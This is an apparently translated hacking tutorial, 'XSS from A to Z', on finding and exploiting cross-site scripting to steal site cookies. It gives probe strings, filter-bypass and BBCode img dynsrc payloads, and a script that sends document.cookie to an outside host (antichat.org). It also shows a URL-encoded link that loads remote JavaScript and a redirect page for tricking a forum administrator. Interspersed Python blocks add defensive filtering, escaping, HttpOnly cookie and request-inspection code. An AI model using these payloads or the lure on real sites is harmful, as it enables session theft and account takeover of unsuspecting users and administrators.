
XSS from A to Z.



  • XSS is Cross Site Scripting
  • How XSS is used
  • What is an XSS attack?
  • What are passive and active XSS?
  • How to find XSS on a site
  • How to tell whether there is a filter
  • Active XSS
  • The test codes we have been using
  • How to put the script into a link with XSS


  • XSS is Cross Site Scripting

    Not to be confused with CSS (Cascading Style Sheets), which is why it is abbreviated XSS.
    This bug first appeared in 1997.



    How XSS is used.


    First we need to know what a cookie is.
    If you already know, you can skip this part.

    Cookies are used to store site credentials on the visitor's computer.
    If you registered on a site under the name 'blabluble', the site saved a cookie file on your computer in which your data is encoded.
    So if you are the admin with access to the site, and I am a user who has stolen your (the admin's) cookies, then I can calmly enter the site and the site will identify me as 'admin': I will have administrator rights.

    To change (substitute the stolen) cookies I advise the CookieEdit program for IE, or the built-in functions of Opera and Firefox.

    To intercept cookies you need to find a place on the site where an XSS attack can be carried out.


    What is an XSS attack?


    XSS attacks are not attacks on the site itself but on the site's users.
    XSS is a flaw in the site's input filtering.

    There are passive XSS and active XSS.

    What are passive and active XSS?


    Passive XSS are those that require the victim's direct participation, plus they have specific limitations and difficulties.
    For that reason passive XSS is not valued much.
    For example, you have to make the victim follow a poisoned link, which requires social engineering and cunning.

    Active XSS are those that do not require any additional action from the victim: the victim only has to open the page with your XSS and the JavaScript code runs automatically.
    Because of this automation they are very useful and valuable.
    For example, active XSS occur in BBCode tags because of insufficient filtering when you leave a message on a forum / guestbook / chat; such an XSS stays active with every reload of the page.




    How to find XSS on a site


    As I wrote earlier, XSS consists of tags, that is, of HTML and the JavaScript language =).

    JavaScript can be inserted into HTML.
    It can be encoded to bypass filters, but more on that later.

    How do you find out whether XSS gets through on a site?
    The basic check:
    <script>alert()</script> We try to insert this script into all the different fields... if the message popped up, the script was processed and executed.

    The most common XSS (seen everywhere the filtering is poor):

    "><script>alert()</script>

    The whole point is in the "> .

    Let's think about what happens when we type "><script>alert()</script> into a field.

    We enter "><script>alert()</script> into the form, and some variable is assigned the field's value. That variable is written back into the page, usually inside a quoted attribute; the "> closes that attribute and its tag, and then

    <script>alert()</script> is executed as a tag of its own.

    This is the most common way of searching for XSS:

    We go through all the fields of the site and try to insert "><script>alert()</script>
    If the message popped up, you have found an XSS...




    How to tell whether there is a filter


    Just enter into any field: '';!-"<########>=&&(()}
    Next, open the HTML of the page and search for the word "########"
    and look at the characters around it.

    If <> remained, that is the first sign of vulnerability: the filter has a hole.
    If the characters , " ' \ remained as they were entered, that is the second sign of vulnerability: extra characters are available for the subsequent XSS attack.
    Then, if you open the HTML and the <> are simply gone, there is most likely still a hole in the filter.
    If you open the HTML and find that <> were replaced by other characters, that is a bummer: the filter is at
    least functioning normally.
    You can also check the filtering by entering this into the field: "><>'"`//\?@%

    Consider the case where the filter eats up <>

    In this case there is still a chance of a hole.
    For example, the filter is written to eat <script> and <>.
    Then try something like <zxcvb script:alert();

    The filter sees nothing dangerous in <IMG%20SRC="java script:alert(); the tag is still closed and thus
    the script is executed.

    Of course, if the filter does not handle the various encodings, you can try to encode the script and insert that code.

    Everything has to be found by trial and error...
    Enter things into the fields and carefully review what came back from the filter.
    By poking at it, work out how the filter works and whether it has flaws.
    If the filter is bad, we can always insert scripts.
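    The three signs above can be turned into a check a developer runs against the output of their own filter. The following is an added example, not part of the original text: the page fragment that echoes the value, the blacklist filter that only strips < and >, and html.escape as the encoding a correct filter should do are all constructed here.

```python
import html

MARKER = "########"

# The probe string from the text (constructed copy, translation spaces removed).
PROBE = "'';!-\"<" + MARKER + ">=&&(()}"


def render_in_attribute(value: str) -> str:
    """Constructed page fragment: the submitted value echoed back inside a
    quoted attribute, which is exactly where a leading "> breaks out."""
    return '<input type="text" name="p" value="' + value + '">'


def classify_filter(rendered_html: str) -> str:
    """Apply the three 'signs' from the text to the HTML that came back.

    'missing'  - the marker is not echoed at all, nothing to judge
    'hole'     - raw < > survived around the marker (first sign)
    'stripped' - < > are gone but the probe's quotes are still raw
    'escaped'  - nothing from the probe survives raw: the filter encodes
    """
    pos = rendered_html.find(MARKER)
    if pos == -1:
        return "missing"
    # Only look near the marker so the page's own quotes do not count.
    window = rendered_html[max(0, pos - 16): pos + len(MARKER) + 16]
    if "<" + MARKER + ">" in window:
        return "hole"
    if "'';" in window or '!-"' in window:
        return "stripped"
    return "escaped"


def strip_angle_brackets(value: str) -> str:
    """Blacklist-style filter that only deletes < and > (the 'filter eats
    up <>' case from the text): quotes pass through untouched."""
    return value.replace("<", "").replace(">", "")


def escape_for_html(value: str) -> str:
    """What a correct filter does instead: encode every HTML-significant
    character, quotes included, so the value cannot close the attribute."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for label, fn in (("no filter", lambda v: v),
                      ("strip <>", strip_angle_brackets),
                      ("html.escape", escape_for_html)):
        verdict = classify_filter(render_in_attribute(fn(PROBE)))
        print(f"{label:12} -> {verdict}")
```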




    Active XSS


    Here you have to use the allowed tags and, hiding behind them, get the request executed.

    For example the tags url, bb, img.
    The whole point of the insertion is that we need to embed a request into the parser of img or url. Img has many parameters besides src and alt.
    This bug is very often used on forums and in guestbooks...

    Let's consider active XSS.

    Warning!!!

    The tags [fon*t], [im*g], [ur*l] are written with a * so that they do not merge with this site's code.
    To use these tags, delete the *.

    For example, let's check a forum for the use of the tags [fon*t], [im*g], [ur*l] and try to insert a script into them or combine them:

    [im*g]http://www.qwewqw.ru/1.jpg[/im*g] A cross (the broken-image icon) appears... that means img is in use and we have picked it up (it is just that img is enabled, but the admins removed it from the message-creation form, saying it is impossible to insert pictures, and it can be used in
    different ways). If there is no cross and the whole line hangs there as text, then try it like this:
    [im*g src=https://www.qwewqw.ru/1.jpg]

    Suppose, for example, we got a cross with this:
    [im*g]https://www.qweqw.ru/1.jpg[/im*g]

    Check whether the filter lets a space through: add a space after the jpg extension:
    [im*g]https://www.qweqw.ru/1.jpg [/im*g]
    If there is still a cross, everything is OK.

    Next, img has the dynsrc and lowsrc parameters, which can hold javascript. We try to insert, for example:
    [im*g]http://www.qwewqw.ru/1.jpg dynsrc=java script:alert()[/im*g]
    check, send: a message pops up, which means you have found an active XSS, and instead of alert() you can insert any script.

    If the filter does not give up, try this:
    [im*g]http://www.qweqw.ru/"/dynsrc="java script:alert()"/1.jpg[/im*g]
    and
    [im*g]http://www.qwewqw.ru/"/dynsrc=java script:alert()/1.jpg[/im*g]

    If a cross came out of the examples above, then https://www.qweqw.ru/1.jpg is replaced with the address of the sniffer.

    There are cases when jpg is disabled by the admin.
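    The defence against the [img] tricks above is a BBCode parser that validates the URL and never lets posted text become an attribute. This is an added example, not code from the original or from any forum engine; the tag grammar and the allowed character set are assumptions made here, and the sample posts reuse the tutorial's own test strings.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Only the form [img]URL[/img] is recognised; [img src=...] and any
# attribute-looking text inside the tag are treated as plain text.
IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)
# Characters that could end the src attribute or start a new one.
FORBIDDEN = set(" \t\r\n\"'<>`\\")
ALLOWED_SCHEMES = {"http", "https"}


def safe_image_url(candidate: str) -> Optional[str]:
    """Return the URL if it is acceptable for an <img src>, else None.

    Whitespace and quotes are rejected outright (the 'space after jpg'
    and dynsrc=... variants in the text rely on them), and the scheme
    must be http or https so no script-style URL gets through.
    """
    if any(ch in FORBIDDEN for ch in candidate):
        return None
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return candidate


def render_bbcode(text: str) -> str:
    """HTML-escape everything, then replace each accepted [img] tag with a
    fixed <img> element whose only variable part is the validated src."""
    out = []
    last = 0
    for m in IMG_TAG.finditer(text):
        out.append(html.escape(text[last:m.start()], quote=True))
        url = safe_image_url(m.group(1))
        if url is None:
            # Rejected: show the tag as literal text, never as markup.
            out.append(html.escape(m.group(0), quote=True))
        else:
            out.append('<img src="%s" alt="">' % html.escape(url, quote=True))
        last = m.end()
    out.append(html.escape(text[last:], quote=True))
    return "".join(out)


if __name__ == "__main__":
    # Constructed posts built from the test strings in the text.
    for post in ("[img]http://www.qwewqw.ru/1.jpg[/img]",
                 "[img]http://www.qwewqw.ru/1.jpg [/img]",
                 "[img]http://www.qwewqw.ru/1.jpg dynsrc=java script:alert()[/img]"):
        print(render_bbcode(post))
```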




    The test codes we have been using all the time:


    <script>alert('HakNet')</script>
    java script:alert('HakNet')
    java script:alert('HakNet')/1.jpg and so on...
    But they did not bring any benefit; they are just codes for testing for XSS.

    Here is the script:
    <script>
    img = new Image();
    img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
    </script>
    This one already steals cookies =)
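    On the defender's side, what stops this script is the HttpOnly flag: a cookie carrying it is not visible to document.cookie at all, so there is nothing for img.src to carry away. Added example, not part of the original: building such a Set-Cookie header with Python's standard library and auditing constructed response headers for the missing flags.

```python
from http.cookies import SimpleCookie
from typing import Dict, List, Tuple

# Attributes a session cookie should carry. HttpOnly is the one that
# defeats the cookie-stealing script: the browser refuses to expose the
# cookie to scripts, so document.cookie simply does not contain it.
REQUIRED = ("httponly", "secure", "samesite")


def session_cookie_header(name: str, value: str) -> str:
    """Build the Set-Cookie header value for a hardened session cookie."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["httponly"] = True    # not readable from JavaScript
    jar[name]["secure"] = True      # never sent over plain HTTP
    jar[name]["samesite"] = "Lax"   # withheld from most cross-site requests
    jar[name]["path"] = "/"
    return jar[name].OutputString()


def audit_set_cookie(header_value: str) -> List[str]:
    """Return the attributes from REQUIRED that one Set-Cookie value lacks.

    Constructed example: 'sid=abc; Path=/' -> all three are missing.
    """
    attrs = [part.strip().lower() for part in header_value.split(";")[1:]]
    present = {attr.split("=", 1)[0] for attr in attrs}
    return [flag for flag in REQUIRED if flag not in present]


def audit_response_headers(headers: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Audit every Set-Cookie header of a response; keys are cookie names."""
    report = {}
    for name, value in headers:
        if name.lower() == "set-cookie":
            cookie_name = value.split("=", 1)[0].strip()
            report[cookie_name] = audit_set_cookie(value)
    return report


if __name__ == "__main__":
    print(session_cookie_header("sid", "abc123"))
    # Constructed response headers as a framework might emit them.
    print(audit_response_headers([("Content-Type", "text/html"),
                                  ("Set-Cookie", "sid=abc123; Path=/")]))
```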




    How to put the script into a link with XSS


    Very easy...
    There are several options:

    - 1) Do it like this:
    http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script> where ***** is the site with the XSS.

    Here is the script itself:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    - 2) You can also do this:
    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> where it refers to http://haknet.h16.ru/script/js.js

    and js.js contains:
    img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; This method is more reliable.

    But as I already wrote, sometimes there are difficulties with the filters on the site (it does not let our script through).
    Then you need to think about how to get around it.
    You can add something, change something or delete something in the script.
    But there is a more reliable option: we simply encode the script. There are many programs for this.
    There is, for example, the site http://ha.ckers.org/xss.html (encoder-decoder).

    Here is an example:
    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    This is the encoded form of:

    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
    - 3) Encoding is needed not only to fool filters but also to fool the ADMIN when using PASSIVE XSS.

    Here is an example based on social engineering.
    We look for contact with the administrator of the forum on that forum, so as to throw him a link to your site, saying something like "there is a cool feature on the site" and so on in the same spirit.
    And on our site, as you will have guessed =), there is this script:

    <script language="JavaScript">
    document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
    </script>

    What does document.location.href do, you ask? )) This is JavaScript code that sends the browser to the specified address without asking. So why do we do this: we gave the admin the link, he went to our site, and that is where it happens... he is immediately thrown to

    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E and this is our XSS in encoded form.

    Note: this only works if the XSS is on the site whose admin you sent the link to...
    In other words, the DRAWBACK of PASSIVE XSS is that the vulnerability can be used ONLY if the victim is AUTHORIZED on the vulnerable site!!!
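    A filter or log inspection that looks only at the raw request misses the encoded link above; decoding first, and repeatedly, is the defender's counterpart to the encoder. Added example, not the page's own code: the indicator list is an assumption drawn from the payloads in the text, and the encoded sample is a copy of the link above with the translation's spaces removed.

```python
from typing import List, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Markers present in the tutorial's own payloads; matched only after
# decoding, so the percent-encoded form from the encoder cannot hide them.
INDICATORS = ("<script", "javascript:", "document.cookie", "dynsrc", "lowsrc")

# The encoded link from the text (constructed copy, spaces removed).
ENCODED_SAMPLE = (
    "%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D"
    "%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61"
    "%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%6A"
    "%73%3E%3C%2F%73%63%72%69%70%74%3E"
)


def fully_decode(value: str, rounds: int = 5) -> str:
    """Percent-decode until the string stops changing (bounded), so a
    double-encoded value is exposed as well as a single-encoded one."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(url: str) -> List[Tuple[str, str]]:
    """Return (parameter, indicator) pairs for query parameters whose
    fully decoded value contains one of INDICATORS."""
    hits = []
    query = urlsplit(fully_decode(url)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        lowered = value.lower()
        for indicator in INDICATORS:
            if indicator in lowered:
                hits.append((name, indicator))
                break
    return hits


if __name__ == "__main__":
    # Constructed requests: the encoded link from the text and a benign one.
    for url in (ENCODED_SAMPLE, "http://*****.ru/free?p=hello%20world"):
        print(fully_decode(url), "->", inspect_request(url))
```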